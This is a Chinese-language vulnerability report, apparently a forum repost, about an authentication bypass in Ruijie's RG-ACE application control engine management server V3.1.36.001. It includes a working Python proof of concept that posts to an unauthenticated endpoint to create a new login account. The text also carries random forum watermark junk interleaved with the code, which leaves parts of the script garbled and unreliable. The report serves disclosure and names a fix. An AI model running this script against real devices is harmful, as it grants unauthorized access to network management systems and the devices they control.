锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

5 F! h, ]4 G2 [! y7 l
! z$ i' c. E! b5 v8 V5 i* s测试的具体版本是
9 T/ T7 A5 ^% \( A% }5 p产品名称: 锐捷应用控制引擎
- I/ @1 V1 j: }; Q  i( _版本号: 3.1.36.001 TC
9 ^2 Q. H9 Q: `/ x/ }* ?编译时间: 201104291730
# V2 T9 {8 M& o" v
/ ]% m& |. h5 H' \+ E, O  O3 \9 T3 R( n
3 c8 _7 D: }$ B5 f( l8 M6 p漏洞证明：




* N% L$ T3 M& n6 |' X+ j

% }9 G( c/ w" ^% u7 v0 `' K% q执行脚本
1 y* E3 x( y+ \3 _2 m% g#! /usr/bin/env python
* i3 b0 s# v7 E% \#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
1 A; `; x' w& v# z3 dopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
3 Y% O* m+ t: t* ?. Z% k("trueName","ad"),
) e+ w2 e  E' X1 \5 P7 M("email",""),
("mobilePhone",""),
("officePhone",""),
; Y, v3 q" y7 r  d1 F% s- q("addr",""),
! g1 N1 ]* Y' P/ f, K2 D("submit","确定"))
& n! Q& s/ r& L6 E- l. r" _8 b$ ~' ]urllib2.install_opener(opener)
/ I* G. L* ?, wp=urllib2.urlopen(url, urllib.urlencode(post)).read()
- b6 F1 a8 a9 |$ q( bprint "Done"

登录，连接设备
4 }% M3 F4 x- D1 H" f1 {! E


2 t% U. x+ A, k8 p1 n7 J* J

默认的管理员admin权限更大点


; H( s% _2 p$ Y: X
. p$ ~' v$ @8 o! f" Y
$ n6 S+ L1 s9 S7 a! X8 {' v7 M" V
修复方案：
; n: d  s3 s- e0 C/ T加强对接口的权限验证
. Q" U! t. M2 \; v; r1 [
  d) e# D/ O5 P- A8 `5 g1 @